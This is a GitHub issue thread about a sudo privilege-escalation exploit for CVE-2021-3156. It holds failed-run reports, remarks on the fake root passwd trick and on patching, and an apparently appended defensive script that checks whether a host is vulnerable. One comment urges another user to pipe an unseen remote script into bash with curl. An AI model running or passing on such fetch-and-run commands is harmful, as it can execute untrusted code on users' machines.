CVE-2021-3156


Open aloksaurabh opened this issue 4 years ago • 6 comments


aloksaurabh avatar Jan 30 '21 11:01 aloksaurabh

Maybe realise that this is not an exploit but a meme exploit. You've been fooled.

Nero22k avatar Jan 30 '21 12:01 Nero22k

The meme is a username :D with uid 10000, blabla. The trick of this exploit is that when you copy the original passwd file to your fake one, you must change your uid to the root uid, which is 0, and then use this buffer overflow exploit to push, replace, a.k.a. overwrite this fake file fakepasswd over your original passwd file :D haha. This is already patched. g00d job stong. If someone wants to exploit this stupid sudo dev error, please do not UPGRADE your OS, because this is already patched, and if you do, you will never exploit this STUPID DEV ERROR ;), just like that, for testing! BR

nu11secur1ty avatar Jan 30 '21 19:01 nu11secur1ty

> I see output like this, which is different from the video:
>
> ```
> ayylmaobigchungussssssssssss0000000000000000000000000000004996
> sudoedit: no password was provided
> ayylmaobigchungussssssssssss0000000000000000000000000000004997
> sudoedit: no password was provided
> ```
>
> Is the test account supposed to have an empty password? But I see an x after meme in the video.
>
> RACE_SLEEP_TIME values tried: 7000 - 14000
>
> Sysinfo
>
> ```
> ubuntu:~/Desktop/2$ uname -a
> Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
> @ubuntu:~/Desktop/2$ sudo --version
> Sudo version 1.8.31
> Sudoers policy plugin version 1.8.31
> Sudoers file grammar version 46
> Sudoers I/O plugin version 1.8.31
> ```

Hello dear friend, can you please execute this command in your terminal, as a normal user, and then paste your output here? If you want to, of course.

```
curl -s https://raw.githubusercontent.com/nu11secur1ty/CVE-mitre/main/CVE-2021-3156/sohoshi/sohoshi.sh | bash
```

BR, thank you =)

nu11secur1ty avatar Jan 30 '21 20:01 nu11secur1ty

it doesn't work for me :(

```
meme@charles-VirtualBox:/opt/CVE-2021-3156$ uname -a
Linux charles-VirtualBox 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
meme@charles-VirtualBox:/opt/CVE-2021-3156$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
```

dickens88 avatar Feb 01 '21 01:02 dickens88

> it doesn't work for me :(
>
> ```
> meme@charles-VirtualBox:/opt/CVE-2021-3156$ uname -a
> Linux charles-VirtualBox 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
> meme@charles-VirtualBox:/opt/CVE-2021-3156$ sudo -V
> Sudo version 1.8.21p2
> Sudoers policy plugin version 1.8.21p2
> Sudoers file grammar version 46
> Sudoers I/O plugin version 1.8.21p2
> ```

Does it make a bunch of directories in the current dir?

Edit: you can also try r4j's exploit which is the exact same strategy (timestamp dir race condition) and bug, but have some slightly different offsets.

stong avatar Feb 01 '21 03:02 stong

> it doesn't work for me :(
>
> ```
> meme@charles-VirtualBox:/opt/CVE-2021-3156$ uname -a
> Linux charles-VirtualBox 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
> meme@charles-VirtualBox:/opt/CVE-2021-3156$ sudo -V
> Sudo version 1.8.21p2
> Sudoers policy plugin version 1.8.21p2
> Sudoers file grammar version 46
> Sudoers I/O plugin version 1.8.21p2
> ```

If you have updated your Linux OS with a package manager, you will never be able to exploit this vulnerability! So, everything has been rebuilt by the Linux vendors, at the level of groups and profiles ;) and patched by the sudo devs ;) By the way, the patch has been pushed out over the internet, using your package manager in a background process! BR

nu11secur1ty avatar Feb 01 '21 14:02 nu11secur1ty
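The thread never settles whether the two test hosts were still vulnerable. Both reported version strings (1.8.31 on Ubuntu 20.04, 1.8.21p2 on Ubuntu 18.04) fall inside the upstream affected range, but Ubuntu shipped the fix as a backport (USN-4705-1) without changing what `sudo -V` prints, so the version string alone cannot answer the "does it work for me" question. The script below is an added example for this page; it is not part of this issue, the exploit repository, or the sudo project. It implements the check from the Qualys advisory (as a non-root user, `sudoedit -s /` answers with an error beginning `sudoedit:` when the bug is present and `usage:` once it is fixed) alongside the advisory's upstream version ranges; the function names and the `--run` flag are this example's own choices.

```shell
#!/bin/sh
# Added example (not from this thread or the exploit repo): tell "patched"
# from "vulnerable" for CVE-2021-3156 on a host using two signals:
#  1. the sudoedit heuristic from the Qualys advisory: as a non-root user,
#     `sudoedit -s /` prints an error starting with "sudoedit:" when the
#     bug is present and "usage:" once it is fixed;
#  2. the upstream version string, which is only a weak hint because
#     distributions backport the fix without changing "Sudo version X".

# classify_sudoedit_output OUTPUT -> vulnerable | patched | unknown
classify_sudoedit_output() {
    case "$1" in
        sudoedit:*) echo vulnerable ;;
        usage:*)    echo patched ;;
        *)          echo unknown ;;   # e.g. "command not found", no tty
    esac
}

# version_in_affected_range VERSION -> yes | no
# Upstream affected ranges per the advisory: 1.8.2 .. 1.8.31p2 and
# 1.9.0 .. 1.9.5p1 (fixed in 1.8.32 and 1.9.5p2). Input is the
# "Sudo version" field of `sudo -V`, e.g. 1.8.31 or 1.8.21p2.
version_in_affected_range() {
    v=$1
    base=${v%%p*}             # drop the pNN suffix for numeric comparison
    major=${base%%.*}
    rest=${base#*.}
    minor=${rest%%.*}
    case "$rest" in
        *.*) patch=${rest#*.} ;;
        *)   patch=0 ;;
    esac
    if [ "$major" = 1 ] && [ "$minor" = 8 ]; then
        if [ "$patch" -ge 2 ] && [ "$patch" -le 31 ]; then echo yes; else echo no; fi
    elif [ "$major" = 1 ] && [ "$minor" = 9 ]; then
        if [ "$patch" -lt 5 ]; then
            echo yes
        else
            # 1.9.5 and 1.9.5p1 are affected; 1.9.5p2 and later are not
            case "$v" in
                1.9.5|1.9.5p1) echo yes ;;
                *)             echo no ;;
            esac
        fi
    else
        echo no
    fi
}

# check_host: run both signals on the current machine and report.
# stdin is /dev/null so a prompting sudo fails instead of hanging.
check_host() {
    ver=$(sudo -V 2>/dev/null | sed -n 's/^Sudo version //p')
    out=$(sudoedit -s / 2>&1 </dev/null)
    echo "sudo version string: ${ver:-unknown}" \
         "(in upstream affected range: $(version_in_affected_range "${ver:-0.0.0}"))"
    echo "sudoedit -s / heuristic: $(classify_sudoedit_output "$out")"
    echo "package version (authoritative on Debian/Ubuntu):" \
         "$(dpkg-query -W -f='${Version}' sudo 2>/dev/null || echo n/a)"
}

# Run the live check only when invoked as: sh check_cve_2021_3156.sh --run
case "${1:-}" in
    --run) check_host ;;
esac
```

Read the three lines together: a `yes` from the version range with `patched` from the sudoedit heuristic is the normal state of an updated Ubuntu host, which is exactly what the replies above are describing when they say an upgraded system can no longer be exploited. Only `vulnerable` from the heuristic means the exploit has a chance at all; offsets and `RACE_SLEEP_TIME` tuning are irrelevant on a patched binary.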